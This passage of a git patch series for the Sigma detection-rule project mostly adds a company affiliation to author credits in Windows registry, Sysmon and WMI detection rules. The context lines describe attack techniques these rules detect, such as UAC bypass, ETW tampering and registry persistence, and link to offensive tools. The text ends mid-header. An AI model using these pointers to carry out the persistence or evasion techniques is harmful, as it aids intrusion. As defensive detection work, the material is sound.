https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/23 modified: 2022/09/18 tags: diff --git a/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml b/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml index 0e5bfd80f..e1deeb06b 100644 --- a/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml +++ b/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the manipulation of persistent URLs which could execute malicious code references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70 -author: Tobias Michalski +author: Tobias Michalski (Nextron Systems) date: 2021/06/10 modified: 2022/11/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml b/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml index 7674417cc..281654ef9 100644 --- a/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml +++ b/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml @@ -5,7 +5,7 @@ description: Detects the manipulation of persistent URLs which can be malicious references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70 - https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us -author: Tobias Michalski +author: Tobias Michalski (Nextron Systems) date: 2021/06/09 modified: 2022/06/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml b/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml index 1607d7cc3..8305bc0e6 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml @@ -9,7 +9,7 @@ description: | references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/10 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml b/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml index c132dc546..5b0b0cbc3 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml @@ -5,7 +5,7 @@ description: Detects change the the "AutodialDLL" key which could be used as a p references: - https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/ - https://persistence-info.github.io/Data/autodialdll.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/10 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_chm.yml b/rules/windows/registry/registry_set/registry_set_persistence_chm.yml index e37f296f8..9d0977b13 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_chm.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_chm.yml @@ -5,7 +5,7 @@ description: Detects when an attacker modifies the registry key "HtmlHelp Author references: - https://persistence-info.github.io/Data/htmlhelpauthor.html - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index ace55a99c..ed6f78356 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml @@ -4,7 +4,7 @@ status: experimental description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a supsicious or unsuale location references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/28 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml b/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml index ef40e6145..4c4c5ac50 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml @@ -4,7 +4,7 @@ status: experimental description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. references: - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/05/30 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml b/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml index 3890a99a7..0b6f1fc11 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml @@ -7,7 +7,7 @@ references: - https://twitter.com/0gtweet/status/1468548924600459267 - https://github.com/gtworek/PSBits/tree/master/IFilter - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml b/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml index db5e42845..d5d1faf95 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml @@ -7,7 +7,7 @@ description: | references: - https://persistence-info.github.io/Data/lsaaextension.html - https://twitter.com/0gtweet/status/1476286368385019906 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml b/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml index 0d0b27555..b49aaf24a 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml @@ -5,7 +5,7 @@ description: Detects when an attacker register a new SIP provider for persistenc references: - https://persistence-info.github.io/Data/mpnotify.html - https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml b/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml index 10d8d7779..576521f47 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml @@ -4,7 +4,7 @@ status: experimental description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) references: - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/09 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml b/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml index 2fbb33be4..2ecc3ed6e 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml @@ -5,7 +5,7 @@ description: Detects when an attacker adds a new "DLLPathOverride" value to the references: - https://persistence-info.github.io/Data/naturallanguage6.html - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml b/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml index 5695093bb..2408800e2 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml @@ -5,7 +5,7 @@ description: Detects modification addition to the 'TypedPaths' key in the user o references: - https://twitter.com/dez_/status/1560101453150257154 - https://forensafe.com/blogs/typedpaths.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/22 modified: 2023/01/11 tags: diff --git a/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml b/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml index 6ba317b79..99f787b6a 100644 --- a/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml +++ b/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml @@ -5,7 +5,7 @@ description: Detects tampering with attachment manager settings policies associa references: - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/01 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml b/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml index a7f56419d..2d1e0b3d0 100644 --- a/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml +++ b/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml @@ -5,7 +5,7 @@ description: Detects tampering with attachment manager settings policies attachm references: - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/01 modified: 2023/01/10 tags: diff --git a/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml b/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml index eb935678c..6cc9f40d4 100644 --- a/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml +++ b/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml @@ -11,7 +11,7 @@ status: experimental description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/11 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml b/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml index 6563c590e..795d4fd11 100644 --- a/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml +++ b/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml @@ -9,7 +9,7 @@ status: experimental description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution references: - Internal Research -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/24 tags: - attack.resource_development diff --git a/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml b/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml index 3377d03c1..fa1599f21 100644 --- a/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml +++ b/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml @@ -4,7 +4,7 @@ status: experimental description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll references: - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/09 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml b/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml index 073cddb27..ef1441165 100644 --- a/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml +++ b/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml @@ -4,7 +4,7 @@ status: experimental description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) references: - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/09 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml index 37986564d..266088492 100644 --- a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml @@ -6,7 +6,7 @@ references: - https://persistence-info.github.io/Data/codesigning.html - https://github.com/gtworek/PSBits/tree/master/SIP - https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 modified: 2022/09/21 tags: diff --git a/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml b/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml index 94507a655..48fc4b899 100644 --- a/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml +++ b/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml @@ -4,7 +4,7 @@ status: experimental description: Detects tamper attempts to sophos av functionality via registry key modification references: - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/02 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_special_accounts.yml b/rules/windows/registry/registry_set/registry_set_special_accounts.yml index eea467063..e4ceacf62 100644 --- a/rules/windows/registry/registry_set/registry_set_special_accounts.yml +++ b/rules/windows/registry/registry_set/registry_set_special_accounts.yml @@ -8,7 +8,7 @@ description: Detects modifications to the registry key "HKLM\Software\Microsoft\ references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md -author: Nasreddine Bencherchali, frack113 +author: Nasreddine Bencherchali (Nextron Systems), frack113 date: 2022/07/12 modified: 2023/01/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml b/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml index 276bafc8b..5f11872a2 100755 --- a/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml @@ -5,7 +5,7 @@ description: Detects the keyboard preload installation with a suspicious keyboar references: - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/12 modified: 2022/03/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml index 2860f1e97..36efc339f 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml @@ -4,7 +4,7 @@ status: test description: Detects a suspicious printer driver installation with an empty Manufacturer value references: - https://twitter.com/SBousseaden/status/1410545674773467140 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/01 modified: 2022/09/21 tags: diff --git a/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml b/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml index 1c86770c1..c5782d849 100755 --- a/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml @@ -4,7 +4,7 @@ status: test description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder references: - https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/ -author: Florian Roth, oscd.community +author: Florian Roth (Nextron Systems), oscd.community date: 2018/07/18 modified: 2022/03/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml index 9cad28208..c43ac9eb2 100755 --- a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html -author: Florian Roth, Markus Neis, Sander Wiebing +author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing date: 2018/08/25 modified: 2022/09/13 tags: diff --git a/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml b/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml index 186a0e114..4882910e5 100644 --- a/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml +++ b/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml @@ -4,7 +4,7 @@ status: test description: Detects the creation of user-specific or system-wide environement variables via the registry. Which contains suspicious commands and strings references: - https://infosec.exchange/@sbousseaden/109542254124022664 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/20 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml b/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml index e4240e42c..e95091dc2 100644 --- a/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml +++ b/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml @@ -8,7 +8,7 @@ description: Detects when the enablement of developer features such as "Develope references: - https://twitter.com/malmoeb/status/1560536653709598721 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/12 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml b/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml index 487b79eeb..4b71a7b9f 100755 --- a/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml +++ b/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml @@ -5,7 +5,7 @@ description: Detects UAC bypass method using Windows event viewer references: - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/19 modified: 2022/11/25 tags: diff --git a/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml b/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml index cac6abb8f..099f3cc19 100755 --- a/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml +++ b/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml @@ -5,7 +5,7 @@ description: Detects the pattern of UAC Bypass using registry key manipulation o references: - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ - https://github.com/hfiref0x/UACME -author: Omer Yampel, Christian Burkard +author: Omer Yampel, Christian Burkard (Nextron Systems) date: 2017/03/17 modified: 2022/12/01 tags: diff --git a/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml b/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml index a9f55b07d..074a35e9a 100644 --- a/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml +++ b/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/03/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml b/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml index 7214854d5..49a89d71e 100644 --- a/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml +++ b/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/23 modified: 2022/03/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml index 5d8312511..855a4688e 100644 --- a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml +++ b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml @@ -4,7 +4,7 @@ status: experimental description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/03/05 modified: 2022/09/19 tags: diff --git a/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml b/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml index a8276ee81..64dc3d851 100644 --- a/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml +++ b/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml @@ -7,7 +7,7 @@ description: | This is often used by attacker as a way to connect to an RDP session without disconnecting the other users references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/09 tags: - attack.persistence diff --git a/rules/windows/sysmon/sysmon_file_block_exe.yml b/rules/windows/sysmon/sysmon_file_block_exe.yml index 327ba2557..4365401b8 100644 --- a/rules/windows/sysmon/sysmon_file_block_exe.yml +++ b/rules/windows/sysmon/sysmon_file_block_exe.yml @@ -4,7 +4,7 @@ status: experimental description: Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set references: - https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/16 modified: 2022/09/12 tags: diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml index 513a3d3cd..6d8b3d558 100644 --- a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml +++ b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious encoded payloads in WMI Event Consumers references: - https://github.com/RiccardoAncarani/LiquidSnake -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/09/01 modified: 2022/10/09 tags: diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml b/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml index 9c1f7b3d7..73fafcc56 100644 --- a/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml +++ b/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml @@ -6,7 +6,7 @@ references: - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/ - https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19 - https://github.com/RiccardoAncarani/LiquidSnake -author: Florian Roth, Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro date: 2019/04/15 modified: 2022/07/07 tags: diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 4dbae9540..6362da032 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1,5 +1,5 @@ # Output backends for sigmac -# Copyright 2016-2018 Thomas Patzke, Florian Roth, Devin Ferguson, Julien Bachmann +# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Devin Ferguson, Julien Bachmann # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by diff --git a/tools/sigma/backends/humio.py b/tools/sigma/backends/humio.py index 6347d49f3..9ae20c198 100644 --- a/tools/sigma/backends/humio.py +++ b/tools/sigma/backends/humio.py @@ -1,5 +1,5 @@ # Output backends for sigmac -# Copyright 2016-2018 Thomas Patzke, Florian Roth, Roey +# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Roey # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index afc0fe441..5ac4ee873 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -1,5 +1,5 @@ # Output backends for sigmac -# Copyright 2016-2018 Thomas Patzke, Florian Roth, Devin Ferguson, Julien Bachmann +# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Devin Ferguson, Julien Bachmann # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by diff --git a/tools/sigma/backends/powershell.py b/tools/sigma/backends/powershell.py index 67d347a03..4c584f434 100644 --- a/tools/sigma/backends/powershell.py +++ b/tools/sigma/backends/powershell.py @@ -1,5 +1,5 @@ # Output backends for sigmac -# Copyright 2016-2018 Thomas Patzke, Florian Roth, Roey, Karneades +# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Roey, Karneades # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by diff --git a/tools/sigma/backends/splunk.py b/tools/sigma/backends/splunk.py index 7d8ef1eb5..dfffc5ed7 100644 --- a/tools/sigma/backends/splunk.py +++ b/tools/sigma/backends/splunk.py @@ -1,5 +1,5 @@ # Output backends for sigmac -# Copyright 2016-2018 Thomas Patzke, Florian Roth, Roey +# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Roey # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by diff --git a/tools/sigma/backends/sumologic.py b/tools/sigma/backends/sumologic.py index 138fd3808..b5ad130c7 100644 --- a/tools/sigma/backends/sumologic.py +++ b/tools/sigma/backends/sumologic.py @@ -1,5 +1,5 @@ # Output backends for sigmac -# Copyright 2016-2018 Thomas Patzke, Florian Roth, juju4 +# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), juju4 # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by From beebafe9cea0ac8d07777ae7919fc0a5ea431626 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 1 Feb 2023 13:22:11 +0100 Subject: [PATCH 2/3] fix: special case Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com> --- .../powershell_script/posh_ps_malicious_commandlets.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml index d10f2c78a..b9324752b 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml @@ -27,7 +27,7 @@ references: - https://github.com/samratashok/nishang - https://github.com/DarkCoderSc/PowerRunAsSystem/ - https://github.com/besimorhino/powercat -author: Sean Metcalf, Florian Roth (Nextron Systems), Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali (Nextron Systems), Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems), Austin Songer +author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer date: 2017/03/05 modified: 2023/01/23 tags: From 31a5c0848009356cb0b001d346da0d09858769ef Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 1 Feb 2023 14:34:46 +0100 Subject: [PATCH 3/3] fix: reduce author set --- .../image_load_side_load_from_non_system_location.yml | 6 +++--- .../proc_access_win_cred_dump_lsass_access.yml | 2 +- 2 files changed, 4 insertions(+), 4 